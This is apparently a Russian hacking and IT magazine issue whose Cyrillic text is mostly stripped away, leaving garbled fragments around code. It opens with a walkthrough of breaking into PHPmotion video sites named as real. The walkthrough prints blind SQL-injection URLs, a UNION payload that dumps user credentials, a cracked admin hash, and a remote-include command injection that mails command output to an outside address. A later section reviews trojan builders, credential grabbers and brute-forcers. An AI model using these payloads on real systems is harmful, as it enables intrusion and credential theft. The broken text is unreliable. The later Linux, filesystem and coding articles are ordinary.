$flag_sql = "SELECT * FROM rating WHERE video_id = $rate_video_id AND user_id = $user_id";
$flag_query = @mysql_query($flag_sql);
$flag_count = @mysql_num_rows($flag_query);
if ($flag_count != 0) {
    @mysql_close();
    error_redirect(117);//"You have already rated this video. "
}
else {
    ...
    error_redirect(118);//"You request could not be completed. "
}
...
?>

warning



.


.
,


,


IDS PHPmotion
-
), MySQL -
:
user() - samworvd_ricarda@
localhost
version() - 4.1.22-standard
database() - samworvd_video

,

PHPmotion.


./uploader_finished.php,

. :

videos.sam-worthington.net
blind SQL-:
http://site.com/phpmotion20/rate.
php?rate_id=-9+or+1=1--&rate=1 true, Location:
index.php?code=117
http://site.com/phpmotion20/rate.
php?rate_id=-9+or+1=2--&rate=1
- false,
Location: index.php?code=118

, (
).

:
1. , PHPSESSID;
2. username
admin;
3. md5-
password.


:
admin md5 21232f297a57a5a743894a
0e4a801fc3.
,
plain-text.info
,
admin :).
,
videos.


sam-worthington.net/siteadmin .
, , SQL-
./siteadmin/manage.php:
<?php
...
if ($_POST['search'] != "")
{
    //if search
    $term = mysql_real_escape_string($_POST['search']);
    $result_sql = "SELECT * FROM member_profile WHERE user_id = $term ORDER BY user_name ASC LIMIT $set_limit, $limit";
    $header_title = 'Todays (new)';
}
...
?>

,

:
-9 union select 1,2,3,4,5,6,7,8,
9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,concat_ws(0x3a,user_
name,password,email_address),25,26
from member_profile/*

, ,
. , ,
file_priv
(

<?php
...
$temp_dir = $_REQUEST['temp_dir'];
// Get all the posted values from the .param file
$_POST_DATA = getPostData($temp_dir, $_REQUEST['tmp_sid']);
...
foreach ($_POST_DATA as $post_key => $post_value) {
    if (preg_match("/^upfile_/i", $post_key)) {
        $uploaded_file_name = $post_value;
        ...
    }
}
...
function getPostData($up_dir, $tmp_sid) {
    ...
    $paramFileName = $up_dir . $tmp_sid . ".params";
    $fh = @fopen($paramFileName, 'r');
    ...
    while (!feof($fh)) {
        $buffer = fgets($fh, 4096);
        list($key, $value) = explode('=', trim($buffer));
        $value = str_replace("~EQLS~", "=", $value);
        $value = str_replace("~NWLN~", "\r\n", $value);
        ...
        $param_array[$key] = $value;
    }
    ...
    return $param_array;
}
...
@exec("$path_to_php $convertor $uploaded_file_name> /dev/null &");// (>/dev/null & part is what sends to background)
...
?>

./images

temp_dir tmp_sid,

.
. , :).
1. site.com , ,
test.txt, :
upfile_=test.mp3;ls -la|mail _@gmail.
com~NWLN~id

2. PHPmotion;
3. : www.videos.sam-worthington.net/
uploader_finished.php?temp_dir=http://site.com/test.txt%00;
4.
-.
:
1. $paramFileName "http://site.
com/test.txt" (".params" - );
2. ~NWLN~ test.txt ;
3. $uploaded_file_name test.txt;
4. exec :
/usr/bin/php /home/site/public_html/phpmotion20/
convertor.php test.mp3;ls -la|mail _@gmail.
com
id> /dev/null &<

, :).
, ,
... . - -
,
- .

,

httpd.conf (/usr/local/apache/conf),

( nobody).
Reverse IP www.yougetsignal.
com/tools/web-sites-on-web-server/ /etc/passwd.
,
- - .

(media.rachelmcadams.org).
/home/rachelmd/public_html/uploads/avi
- .
:

, ,
- fan-sites.
org, :).

- , , ,
,
.

. :
- ? z



icq 884888

X-TOOLS

: GeneratorTroj
: WINDOWS 2000/2003/XP/VISTA/7
: NOXJOKER

);
hosts (
).

-
,
exploit.in/forum/
index.php?showtopic=34995.



noxjoker.
-
( ), ,
, ,
, .
:
e-mail /
FTP;
cookies Mozilla
FireFox, Opera, IE, Google Chrome;
ICQ 6.0 QIP
Infium;

;
KeyLogger (
)
;


(:
,
,
, , );
(, ,
);
;
Remote desktop control ( , ,
IP-);
Backdoor ( ,


(downteam.
ru/2010/01/duvet.html).

: 1X
: WINDOWS 2000/2003/XP/
VISTA/7
:

: DUVET
: WINDOWS 2000/2003/XP/
VISTA/7
:

,
(, :).
downteam.ru
.
,
- Duvet.

, : mail.
ru, chat.ru, e-mail.ru, bigmir.net, yandex.ru,
rambler.ru, moemesto.ru, 100zakladok.ru,
vzakladki.com.ua, postquickly.ru, bookmarkwizard.ru, mylink.org.ru, tvoirod.ru, addtome.ru,
bobrdobr.ru.
:

;
antigate.com;
;
ICQ- (, bigmir.net
rambler.ru
).


downteam.
:

(, :) .
,
1x.
1x ,

.
,

,
.
. ,

email:password.
:

;
( );

antigate.com;

(simpleproxy.ru);

( , , ).


:
1.
.

, (
)
.
.
2. e-mail. ,
.

, ,
.

,
, ( ,
,
,
)
.

( );
.
u.j.anger
:

;
windef;
SMTP- (
);
.

,
: http://
forum.asechka.ru/showthread.php?p=633911.

: SKYPEFLOODER
: *NIX/WIN
: INLANGER && LOGIN999

: BRUTTY
: WINDOWS 2000/2003/XP/VISTA/7
: ANGER && U.J.ANGER

Checker Antigate, ,
, antigate.
com.
login_pass.txt login;pass.

good.txt,
;; []. , , -


Skype. . , SkypeFlooder
,
Python .
:
;
;

;
, ,
;
, , , .


- , .
,
( )
grabberz.com/showpost.
php?p=278269&postcount=5.

: NOSOCKS
: WINDOWS 2000/2003/XP/VISTA/7
: RANKOR

- , .
SOCKS4-
RankoR.
:

,
Brutty

, Rankor'.

:
(~500);
;
GUI
VNC scanner;
;

Windows ( -
System);

Svchost.exe (
);

,

(
,
).
GUI- ,
:
forum.antichat.ru/thread116226.html.
,
login999 exe- .

: CHECKER ANTIGATE
: WINDOWS 2000/2003/XP/VISTA/7
: ^TERIKON^
,
, - antigate.com.
?
:).
-

- ;
,
ICQ;
1080;

;
(2-5 );
3,91
( UPX, Debug-).


: forum.asechka.ru/
showthread.php?t=118622.z



Mifrill mifrill@real.xakep.ru

VS


,
-

. ,

,
.

, .
.
TORRENTS.RU

][

,
,
.

.
,




,

(, ).
, -
.
,

IFOLER.RU ,
.


. ,
, , . ,
,
,
,
.
,

-.
, torrents.ru, .

- .
2004 , torrents.ru ,
, . ,
,
, ,
.
(
), torrents.ru . , , , , , , .
, , ,
torrents.ru , ,
DDoS . ,
,
. , , torrents.ru
.
, 2007 torrents.ru .
,
( torrents.ru
Free-Torents.org Tapochek.net).
.
, ,
(
, , ),
- ,
.
, ,
. , ,
,
The Pirate Bay.
,
, , torrents.ru , ,
. , ,
, . , torrents.ru
,
100% . ,
- 2-3% (
),
,
.
, torrents.ru ? , , -



,
-
.
, .
,
.
,
18 2010 ,
torrents.ru,
,
torrents.ru
- (
)
. 16.02.2010.
,
,
.
, , , -
. ,
,
http://
rutracker.org. ,
, , .


,

,
. , , - ,
,
.
,


Autodesk. ,

.
...
,
,
,
Autodesk , Torrents.ru

.

1C ,

.
, !

,
?!,
- .
, : 26 AutoCAD
Autodesk ( ,
Autodesk!).

, , ,

1,5 .

torrents.ru ,
, (
, ,
).
, , -

, .
-
,
-

. , ? .
, torrents.
ru ,
, ,
,

.
-
EKinoT.ru. , , .


. ,
,

Torrents.Ru, ShareReactor.Ru
. ,
,
- .

IT.
eBay, Twitter,
Cisco Systems, Howcast, Edventure, Social
Gaming Network Mozilla. ,
-
.
, , ,
Twitter, , , ,
Catalys.



,
. - ,
, .

.
,
,
.
, --

- .

, .
,
,
. -
, ,
.
, , p2p-
,
,

- .



... ,
.
,
, ,
.
- , rutraker.org:
, - .
*.RU,
-
(
-). -
, .RU
,
. -, ,
, ,
,
.
, , ,

.
, .
rutraker.org
,
.

,


TORRENTS.RU ,
.
.
:
.ru
-... ).
Dreamtorrent Corp.(
) -,
.
,

-, .
,

.

IFOLDER.RU

,
, ,
.
, ,
ifolder.ru
( ,
).
RapidShare
Depositfiles ,
1,5 . .

IT- Agava.
ifolder.ru ,
-
,
/

.
rutracker.org
, , , -
.
ifolder.ru
, .


- .
, .
17- ifolder.
ru .
,
- Golden Telecom 2-
. . 5,
3- .
- ,
ifolder.ru
- ,
-.
,
,


,
,
. - .
,
. -
.
-


. 74 . ,
ifolder.ru ,
. ,

.
-


. ,
,
, , -
,
.
DNS- , , ,
.
? -
torrents.ru.
, ,
,
. ifolder.ru.

, -
TORRENTS.RU.


. , iFolder
, ,

. ,

,
, , ,
.
, , ,
,
.
- ,

.

:

,

.

,

.
-torrents.ru, ? ,
, .ru, .
, , .
, ,
happy end,

. ,
- , ,
iFolder .
(
, ).
, 19-

-
. , ...
,
ifolder.ru,
, .
19 , ,
, ,
.

:
, .
, ,
. ifolder.ru -
.
. ,
:
.
,

,
: ... , ,
,
, .
,
- , . , ,
,
.

IT- :
. . .
.
, , -
IT- -
,
, ,
?
-, ,
,
. , IT-
. z


UNIXOID
zobni n@gmail.com

Metadata Cluster

Clients

Object Storage Cluster

Ceph

,
, .


,
.
.
FREEBSD
8 , ULE
FreeBSD,
(http://jeffr-tech.livejournal.com)


FFS (Fast FileSystem) FreeBSD.



, BSD-
.
.

, -

5 10 ,
.
, , GEOM- gjournal (
FAT12)
Linux, .

SDFS


Ceph


,
. -
,
. , ,
, :
1. (, , ..) inode;
2. , , ;
3. inode:_ .

. , . VFS,
, . ,

, VFS ,
.
( , , ), , fsck,
.

, , .
,
,
fsck
. : , .

,
. : -
.
,

.
. ,
, .

.
: , , ,
.

FreeBSD ,
(Soft Updates). ,

,
.
. : inode .
(, , ,
inode), , fsck
(, , FreeBSD).
Soft Updates
, fsck
,
. , , , , iXsystems,
Yahoo! Juniper networks .
(
)
, Soft Updates.
,
inode,
Soft Updates.

.


SDFS

.
( ) ,

. , , . ,
, , , .

.

, .


.


UNIXOID

SDFS vs. Ext4 bonnie++

, ,
, :
,

Red Hat Enterprise Linux 5. ,
, 1000.
, .
, 10
, 1000
10 , 20
500 .
,
2 , . , 2 Red Hat Enterprise
Linux 5. ,
, ,
200 !
NAS
. ZFS 2009 ,
SDFS, Opendedup (www.opendedup.org).
, SDFS
. , Java
fuse (fuse.sf.net). SDFS :
1. Fuse Based File System. ,
.
2. Dedup File Engine. ,
, .
3. Deduplication Storage Engine. , . , .
Amazon S3, -.
, ,
. , , Dedup File Engine,

. Dedup File Engine (Fuse
Based File System) JNI (Java Native Interface).
Amazon S3. 8 ,
250 ,
256 , Deduplication
Storage Engine.
4 .


( )
-
. SDFS
,
NFS CIFS .

CEPH

Open
Source . ,

. ,
,
,
, , . ,
,
,
. Ceph,
, Linux- 2.6.34.
Ceph (http://ceph.newdream.net) ;
2006 . 2007
, fuse,
Linux. Ceph
.
Ceph :
POSIX;
;
( );
;
N-way ;
/ ;
( );
fuse-;
Linux.
, GFS, OCFS2 GPFS,

, Ceph ( ,
Lustre). , , , ,
; .

Write Performance over Time

SDFS


, .
, ,
.
, (metadata server),
-,

. Metadata server
,
. , inode-,
, .
inode'
-.

metadata-,
.
Ceph,
,
, , .
,
, .

ZFS?
ZFS , Open Source,
. , ,
.
Sun Microsystems ( Oracle)
Solaris 2005 ,
. .
ZFS ,
, , , . ( , , Sun)

. ZFS,
OpenSolaris, CDDL,
, , GPLv2, Linux.
, ZFS :
, ZFS
, , Linux
CDDL, ,
ZFS GPL, Sun' .
,
ZFS Linux fuse (http://zfs-fuse.net), , ZFS
. Apple
ZFS Mac OS X
ZFS 10.5 Leopard,
2009 . ,
BSD, Mac OS X,
ZFS Apple ,
Sun,
Apple.
2007 ZFS
FreeBSD. ,
, 15 FreeBSD
Solaris, ZFS.
11 2010 FreeBSD
zpool v14 ( ZFS OpenSolaris: zpool v16).
ZFS NetBSD.
Google Summer of Code 2007 (
) .
Summer of Code 2009, 2009
ZFS NetBSD.
ZFS GPL,
GRUB,
ZFS-. z


UNIXOID
vasilisc vasilisc777@gmail.com

Ubuntu

- ,

. Gentoo, Pygoscelis papua. ,
!
COMPIZ
Compiz X
Window System, OpenGL
3D-.
, ,
GNOME KDE.
, , ,
. ,
Compiz, ,
.
, Compiz
.
compizconfig-settings-manager
:


$ sudo aptitude install compizconfig-settings-manager

Compiz
,
:
Compiz Config.
Compiz,

, .

GTK
Ubuntu Gnome,
GTK.
, ,
.
, :

$ gedit ~/.gtkrc-2.0
### ,

gtk-menu-popup-delay = 0
###
,
gtk-menu-popdown-delay = 0
###

gtk-menu-bar-popup-delay = 0

GNOME
Gnome
MS Windows, ,

KDE

CompizConfig
,

, auto_raise_delay,
:
$ gconftool-2 --type integer --set /apps/metacity/general/auto_raise_delay 100

XML

Gnome

Gnome XML-.
gconf-editor
gconftool-2. ,
:
1. Metacity ,
:
$ gconftool-2 --type bool --set /apps/metacity/general/reduced_resources true

,
;
2. / :
$ gconftool-2 --type bool --set /apps/panel/global/enable_animations false

3. , ..,
:
$ gconftool-2 --type bool --set /desktop/gnome/interface/accessibility false

4. :
$ gconftool-2 --type string --set /apps/panel/global/panel_animation_speed panel-speed-fast

XML Ubuntu
. XML , , , . XML-
. ,
: www.gnomefiles.org/app.php?soft_id=1397. (desktop-optimizations.tar.gz)
:
1. rhythmbox-quickstart Rhythmbox;
2. evolution-optimize
Evolution;
3. gnome-optimize Gnome;
4. openoffice-optimize OpenOffice.
org;
5. doc-optimize Gnome;
6. gconf-optimize Gnome (
Gnome).
, rhythmbox-quickstart
gconf-optimize .
,
.
XML ,
.
, , sudo.
,
- , ,
, . .

,
QT
, Gnome GTK, KDE Qt, GTK KDE, Qt Gnome. ! Gnome KDE ,
, .
, , Qt Gnome. , Qt'
KDE, .
KDE. ,
KDE? :


UNIXOID

.gtkrc-2.0

Gnome
INFO
$ sudo aptitude search '~i!~nlib(~Dqt|~Dkde)'

info


GTKPerf:
linux.softpedia.
com/progDownload/
GtkPerfDownload-6715.html

,
.

,
.
. ,
.

DVD
dvd



optimizer.sh, sqlite_
shrink.sh
rebuild_cache.sh.


, ('~i') ('!~nlib') Qt ('~Dqt') KDE


('~Dkde'). KDE
,
.
:

/usr/bin/kdeinit FastQt. ,
Qt-
.


PRELOAD
Preload , ,
, ,
.
preload :
$ sudo aptitude install preload

, preload . preload
, -
/etc/preload.conf .


SQLITE
Ubuntu
, ,
SQLite.

.
sqlite3
:
$ sudo aptitude install sqlite3


SQLite.
.
$ gedit ~/bin/optimizer.sh
#!/bin/sh
### Firefox
find ~/.mozilla/ -name '*.sqlite' -print -exec sqlite3 {} "VACUUM; REINDEX;" > /dev/null 2>&1 \;
### Epiphany
find ~/.gnome2/epiphany -name '*.sqlite' -print -exec sqlite3 {} "VACUUM; REINDEX;" > /dev/null 2>&1 \;
### Liferea
sqlite3 ~/.liferea*/liferea.db "VACUUM; REINDEX;" > /dev/null 2>&1
exit 0

chmod +x ~/bin/optimizer.sh
.

, .


SQLITE
SQLite-
Firefox, Epiphany RSS- Liferea.
. SQLite-
:). ?
1. sqlite3 ,
:
$ sudo aptitude install sqlite3

2. ~/bin/sqlite_shrink.sh :
$ gedit ~/bin/sqlite_shrink.sh
#!/bin/bash
# bash is required: "read -d" is not supported by dash, Ubuntu's /bin/sh
find ~/ -size +100k -type f -print0 | \
while IFS= read -r -d '' FILE; do
    abs_file_name=$(readlink -f "$FILE")
    headfile=`head -c 15 "$abs_file_name"`;
    if [ "$headfile" = "SQLite format 3" ]; then
        file_size_do=`du -b "$abs_file_name"|cut -f1`;
        sqlite3 "$abs_file_name" "VACUUM; REINDEX;" > /dev/null 2>&1
        file_size_posle=`du -b "$abs_file_name"|cut -f1`;
        echo "$abs_file_name";
        echo "  size before: $file_size_do";
        echo "  size after:  $file_size_posle";
        echo -n "  percent of the original size: "
        echo "scale=2; ($file_size_posle/$file_size_do)*100"|bc -l
    fi
done
sleep 2
exit 0

3. ~/bin/sqlite_shrink.sh
chmod +x ~/bin/sqlite_shrink.sh.
4. Ubuntu ,
<Ctrl+Alt+F1>. :
$ sudo /etc/init.d/gdm stop
$ sudo /etc/init.d/kdm stop
$ ~/bin/sqlite_shrink.sh > ~/report_sqlite_shrink.txt

5. :
$ sudo shutdown -r +0

,
SQLite, . ? ~/report_sqlite_shrink.txt, ,
. Google Chrome KDE
. ,
.

$ gedit ~/bin/rebuild_cache.sh
#!/bin/sh
### rebuild the icon caches of the user's themes
for d in ~/.icons/*; do gtk-update-icon-cache -f "$d"; done
### rebuild the icon caches of the system themes
for d in /usr/share/icons/*; do sudo gtk-update-icon-cache -f "$d"; done
### rebuild the font caches
sudo fc-cache -fv
fc-cache ~/.fonts

chmod +x ~/bin/rebuild_cache.sh.
Gnome, ~/bin/rebuild_cache.sh,
.

vm.swappiness=10

$ mkdir ~/.compose-cache

Qt/GTK , , libX11
~/.compose-cache
.

UBUNTU
. , ,
, . ,
. ,
, - . ? ,
.
, .
Ubuntu
.
vm.swappiness, 60
, , swap.
, , 40% (100-60), Ubuntu
.
vm.swappiness
10, swap,
90% (100-10).
:
$ sudo sh -c 'echo "vm.swappiness = 10" >> /etc/sysctl.conf'

, swap .

GTK+ , gtk-update-icon-cache, . -
(mmap()ed) ,
.
, gtk-update-icon-cache,
, . fc-cache,
.

, , / ,
.
. ,
, , ,

. , ,
. z


UNIXOID
dhsilabs@mail.ru


Linux
,
. GPS-,
, ,
.
?
,
. carpc
:
- ;
GPS-;
;
.
:
, GPS-,

$100300.
, , .
,
,
. .

Google ,


. ,
,
, .
/,
10-20 ( ) .

. ,
. Carpc .
: ,
,

.
, , , .
.


,
carpc ,


.
,
. ,
,

(),

+12 220 .
:
.

, ,

, :
(
)
(,

,
),
.

12 -220

- Mini-ITX

,
, ,
.
,
( ),
.
, 220 .

(). : ,
( , ), (
). .
, 220 .

: ,
. , :
$100.
.
Mini-ITX' (Mini-ITX -
, VIA
Technologies). ATX, 170170 . ?
, $80-120. , , $38.
, ,
.
, . :
,
USB-. ,
USB- .
,
(
).
Mini-ITX' .
:
( , , ),
, ( , , ). ,


-
.
Linux.
40 .
BMW (
www.bmwclub.org.ua).


UNIXOID

InfraLinux

HTTP://WWW
links
ru.wikipedia.
org/wiki/Ubuntu_
Netbook_Remix
Ubuntu
Netbook Remix
www.ubuntu.com/
getubuntu/downloadnetbook
Ubuntu Netbook
Remix
pccar.ru ,

, ,
.
, ,
. , ,
: ,
. 1 ,
. . (
/) .
, ,
. .
3.5",
. HDD ?
.



, . :
() , , ,
, .
: , .
()
. , , .
,
.
.
, ( , )
.
, .
, ...
, .
, , ()


. , 100
( ,
) .
( ).
, .
,
.
.
,
.
( ).
$300.
$100-150.


, ,
, . ,
-25, ; ,
. . . ,
, TFT .
, carpc .
+30 . . ,
, . :
,

. ,
, 6, ,
+30, +24.


, , . ,
.
Windows 7
+ IGO-8.
.
Linux? carpc
,
Ubuntu .
, Ubuntu Ubuntu
Netbook Remix , . Netbook Remix
.
Netbook Remix, , InfraLinux.
Linux :
,
.

tangoGPS
. ,
Ubuntu , Medibuntu
. :
$ sudo wget --output-document=/etc/apt/sources.list.d/medibuntu.list http://www.medibuntu.org/sources.list.d/$(lsb_release -cs).list
$ sudo apt-get --quiet update
$ sudo apt-get --yes --quiet --allow-unauthenticated install medibuntu-keyring
$ sudo apt-get --quiet update

:
$ sudo apt-get install w32codecs

MPlayer :
$ sudo apt-get install mplayer non-free-codecs libdvdcss2 smplayer


DVDCSS2, DVD-.
-. Linux
, . . :
cheese ( ), webcam ( - ),
camorama, camstream . , .
USB-.
,
. NetworkManager (
-), . ,
, usb_modeswitch, .
, . , .
/usr/local/bin:
$ sudo cp /media/CNU-680/Linux/RDEVCHG /usr/local/bin

/etc/sudoers:
$ sudo gedit /etc/sudoers


GPSDrive
%admin ALL=NOPASSWD: /usr/local/bin/RDEVCHG

RDEVCHG .
, ,
. /etc/udev/rules.d/70-persistent-cd.
rules, :
ENV{ID_CDROM}=="?*", ENV{ID_SERIAL}=="CMOTECH_Mass_Storage_000000000002-0:0", SYMLINK+="cdrom1", ENV{GENERATED}="1"
ENV{ID_CDROM}=="?*", ENV{ID_SERIAL}=="CMOTECH_Mass_Storage_000000000002-0:0", SYMLINK+="dvd1", ENV{GENERATED}="1"

:
ENV{ID_CDROM}=="?*", ENV{ID_SERIAL}=="CMOTECH_Mass_Storage_000000000002-0:0", SYMLINK+="cdrom1", ENV{GENERATED}="1", RUN+="/usr/bin/sudo /usr/local/bin/RDEVCHG"
ENV{ID_CDROM}=="?*", ENV{ID_SERIAL}=="CMOTECH_Mass_Storage_000000000002-0:0", SYMLINK+="dvd1", ENV{GENERATED}="1", RUN+="/usr/bin/sudo /usr/local/bin/RDEVCHG"

NetworkManager
CDMA. , (mts) (internet). , .
.
Any DATA ADU-500A ( ) MTS Connect (mtsconnect.sourceforge.net).
GPS: Linux GPS-,
, ,
GPS-.
GPS-, ,
Linux.
GPS- Linux: Navit, tangoGPS GPSDrive.
Navit ,
.
. GPS- , -.
Ubuntu, .
Navit , tangoGPS GPSDrive OpenStreetMap
(www.openstreetmap.org). GPSDrive , Options
Maps Download.
. !z


CODING
timreset@mail.ru, javatalks.ru

POKER

ROOM
-:

-. ?
-, ,
. -,

- .

>> coding

DVD

NEGOTIATOR

LOGIC

dvd

STATISTICS


,

, unit- ,
,
-

.

HTTP://WWW

links

, . , ,
.
,
, ,
, ,
. :
-, -, , -, , ,
//, , , .
.
Texas Holdem No Limit Poker, .

?
:
Logic (Fold, Call, Raise)
Negotiator
;
Statistics
.
Negotiator Logic
. Logic Negotiator
, (
Fold, Call Raise). Negotiator Statistics
. Statistics Logic .

, : Fold, Call, Raise. All-in


,
. : DIVAT , , (,
).
, .

,
: , ,
.
,
, , , . , , - .


,
,
pokerai.org
AI,


- www.
codingthewheel.com

:
p*pot = win, p
( ), pot
,
win , ,

.
win < bet_cur, Fold

-

- (
) .
- . ?
, ,

. . , ,
.. . ,
-
.


bet_cur + SB > win >= bet_cur, Call (


Check)
win >= bet_cur + SB, Raise ( Bet)
bet_cur ,
( ),
, .

bet_cur:
$10,
$5, , bet_cur $15 (10+5).
SB (Small Blind) (
. .). bet_cur ,
,
. , win > bet_cur, win < bet_cur
+ SB, , bet_cur + SB.
BB (Big Blind) - .

,

.
(outs)
(odds). ,
/ .

(
win). ,
( ) , . , ,
( bet1).
, ,
( bet2).
- , . :

bet 1

win

bet2

pot


. , .
. ?
- .
. Java
JavaDoc, .
:
52 = 4 x 13 .
= < >/4 (/ ).
= < >%13 (% ).
, 10 . :

p*pot*0,91 = win

,
?
:
1) , ,
;
2)
,

( ,
, -. , -).
.
. 2.598.960 (
5 52), 10
( , 4
). , ,

( , ),
, .
.
,
.


isHighCard, isOnePair, isTwoPair, isSet, isStraight,
isFlush, isFullHouse, isQuads, isStraightFlush, isRoyalFlush.

,
-1 12, -1 ,
0 12 . 0 , 1 ,
12 . .




.
,
.



1 7. ,
- ( ,
), (
).
, ,
.
, :
1) ;
2) :
,
.
sortHand (. ).
hand, .
card ( ), suite (
), suiteCount ( ).
(
).
, . ,
13. , , ,
(, )
. (
card), ( suite) ( suiteCount).

void sortHand(int[] hand, int[] card,
        int[] suite, int[] suiteCount) {
    // Bubble sort, descending: by rank (hand % 13) first,
    // then by card number for cards of equal rank.
    for (int i = 0; i < hand.length; i++) {
        for (int j = 0; j < hand.length - 1; j++) {
            int t;
            if (hand[j] % 13 < hand[j + 1] % 13) {
                t = hand[j + 1];
                hand[j + 1] = hand[j];
                hand[j] = t;
            }
            if ((hand[j] % 13 == hand[j + 1] % 13) &&
                    (hand[j] < hand[j + 1])) {
                t = hand[j + 1];
                hand[j + 1] = hand[j];
                hand[j] = t;
            }
        }
    }
    // Split every card into rank and suit and count the cards of each suit
    // (suiteCount must arrive zero-filled, with one slot per suit).
    for (int i = 0; i < hand.length; i++) {
        card[i] = hand[i] % 13;
        suite[i] = hand[i] / 13;
        suiteCount[suite[i]]++;
    }
}

(
,
):
isHighCard
.
isOnePair
, , .
isTwoPair
, ,

.
isSet
, , .
isStraight
, . ,
.
isFlush
, , .
isFullHouse
. .
isQuads
, .
.
isStraightFlush
,
, .
.
isRoyalFlush
, , , ,
, 10, 9 . 12 (
).

,

(, ),
() , C
native .. ,
,
.


.
, .
2 9 . T
( 10), J , Q , K
, A . c, s, d,
h.

int getCombination(int[] hand, int[] board) {
    // Merge the pocket cards with the board cards, if there are any.
    int[] allCard;
    if ((board == null) || (board.length == 0)) {
        allCard = new int[hand.length];
        System.arraycopy(hand, 0, allCard, 0, hand.length);
    } else {
        allCard = new int[hand.length + board.length];
        System.arraycopy(hand, 0, allCard, 0, hand.length);
        System.arraycopy(board, 0, allCard, hand.length,
                board.length);
    }
    int[] card = new int[allCard.length];
    int[] suite = new int[allCard.length];
    int[] suiteCount = new int[4];
    sortHand(allCard, card, suite, suiteCount);
    // Check from the strongest combination down. Every class owns a band
    // of 13 values: its base offset plus the 0..12 result of its is* check.
    if (isRoyalFlush(card, suite, suiteCount) != -1) {
        return 117;
    }
    int result = isStraightFlush(card, suite,
            suiteCount);
    if (result != -1) {
        return 104 + result;
    }
    result = isQuads(card);
    if (result != -1) {
        return 91 + result;
    }
    result = isFullHouse(card);
    if (result != -1) {
        return 78 + result;
    }
    result = isFlush(card, suite, suiteCount);
    if (result != -1) {
        return 65 + result;
    }
    result = isStraight(card);
    if (result != -1) {
        return 52 + result;
    }
    result = isSet(card);
    if (result != -1) {
        return 39 + result;
    }
    result = isTwoPair(card);
    if (result != -1) {
        return 26 + result;
    }
    result = isOnePair(card);
    if (result != -1) {
        return 13 + result;
    }
    return isHighCard(card);
}

, ( getCombination).
118:
( 13 ),
(-, )
9x13+1=118. 12
( ),
, .

, , .

,

, .


,
, ,
.
(-) (
).
,
,
. , High card
( )
0 12, 0 High card
, 12 .
13 25, 13 , 25 .
, , (getProbabilityOfWin). : , ( )
. ,
(
) .
, 1 (,
,
1/< + 1>).
:
,
, ,
.

,

. ,
.
,
,
. ,
.
,
,

. :
, ,
, .
,
. (p*pot
= win), p pot, win
.
p
,
2,
.
,
() ()
][
(alexander@
real.xakep.ru). , ,
, ,

Texas Holdem
No Limit Poker,
. z


1) ;
2)
(
);
3)
;
4) ,
1/<
>;
5) 1-4
;
6) <-
>/< - >.

unit-,

.

CODING
stannic.man@gmail.co

EARN
CASH
NOW!

WINDOWS:

,
Windows
.
, , ,
.

, , ,
, .
,
, ,
Windows.


, Windows? , ,
, , -
.
,

DVD
dvd

0xd4680000


Windows,
,
,

,
.

HTTP://WWW
links

SECTION_OBJECT_POINTER


Windows.


() ,
,
, , . -,
,
/,
. HDD .
,
,
( /
) .
, , ,
.
: ,

, . ,
128
(, ?).
,
. ,
.

.
, ,
(mapping file)
WinAPI.


, ,
,
.
, , .

().
,
,
.
,

, , .
- ,

MmSizeOfSystemCacheInPages.
0x20000 , , 4 ,
512 . ,
,
Windows
,
.

Windows

www.osronline.com.
,

,



. ,
.

INFO

info

,
,

WDK
http://download.
microsoft.com


Virtual Address Control Block (VACB),
256- .


Windows

,
VACB. VACB CcVacbs.
- :
, VACB
. , , -

.
VACB. , , , .
,
Windows
. ..
, .
MmSystemCacheStart,
,
MmSystemCacheEnd, .
MmSystemCacheWs
. ,
. (
, )
KDDEBUGGER_DATA32. ,
,
.
CcCopyRead,
CcCopyWrite CcFastCopyRead
CcFastCopyWrite. ,
CcFastCopyRead CcFastCopyWrite
32- /
.

. ,
CcCopyRead (CcFastCopyRead)

(file mapping) , .
,
, , .
CcMapData, CcPinRead,
CcPreparePinWrite .,
.


PRIVATE_CACHE_MAP SectionObjectPointer

, : ,
.

, , , , ,
: ,
?
,
,
. -
,

FIPS, - ( ) .
? , ,
, .
Cc*,

.
. , , , .
,
.
FILE_OBJECT,
, , -,
PRIVATE_CACHE_MAP SHARED_CACHE_
MAP. PRIVATE_CACHE_MAP
FILE_OBJECT 0x18.
FILE_OBJECT SectionObjectPointer, ,
, 0x4
SHARED_CACHE_MAP.


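// Section object of the process (FindProcessSectionObject is not defined in this excerpt)
SectionObject = (PSECTION_OBJECT)FindProcessSectionObject(pEprocess);
if (MmIsAddressValid(((PSEGMENT)SectionObject->Segment)->ControlArea))
{
    FileObject = ((PSEGMENT)SectionObject->Segment)->ControlArea->FilePointer;
    // Clear the three low-order bits of the stored value to get the FILE_OBJECT address
    FileObject = (PFILE_OBJECT)((ULONG)FileObject & 0xfffffff8);
}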

PRIVATE_CACHE_MAP, , .
SHARED_CACHE_MAP, 0x040
VACBs,
. VACB, , ,
. , ,
UNICODE_STRING, FILE_OBJECT, 0x030.
,
FILE_OBJECT, ;
.
, , .

.
Windows, , ,
. Windows
, Windows NT
File System Internals. , 1997 ,
.
, ! z


CODING
c0n Difesa condifesa@gmail.com, http://defec.ru

ONLINE
WEB-SERVICES: -

-
-,
.
,
-.


. -
,

.
, () XSS/SQL-inj/PHP-including. ,

,
. , //,
, ,
,
-. . , ( ), .
,
.
-
, ,
, . - -


.

, . , ,
,
-.

,
. ,
,
.
, , , , , .
-? , ( ,
. .). ,
, ,

,

-

. ,
, .

,
-. . Web-service , :
1) -;
2) HTTP-
- ;
3) -
.
Microsoft,
Microsoft .NET. ,
- .NET Framework:
- -.
, .NET
Remoting
. -
MS.
HTTP SOAP (Simple Object Access
Protocol). , .NET Framework ,
,
. , C#,

, ASP.NET -
.NET. ,
.
, -
CrossSite Scripting ( XSS),
(
). , ,
.


-,

. .
:
1. ;
2. ;
3. , ;
4. , ;
5. ( ).
, ,
:
, ,
.

,
, .NET
Framework Visual Studio,
,
.
ASP.NET Web Service Application
,
, .
:
1. ASPX-, web-;
2. ASMX-, , , web;
3. Web.config,
;
4. Global.asax, ;
5. DLL,
.
ICholeScaner.asmx, (
), -

DVD
dvd



Microsoft Visual
Studio 2008.

HTTP://WWW
links

forum.antichat.ru/thread20140.html

XSS-.
.
www.w3.org/TR/soap/ -
SOAP.
, ,
-.
defec.ru - ,
, ,

.



HTTP- GET POST, :
GET /icholescaner.asmx/StartScan?domen=www.enemysite.com HTTP/1.1
Host: www.site.com

, - ( , ),
, -, .
,
, XSS-.

, !

-
- .NET Framework.
:
ASMX-
<%@ WebService Language="C#" CodeBehind="~/App_Code/ICholeScaner.cs" Class="ICholeScaner" %>

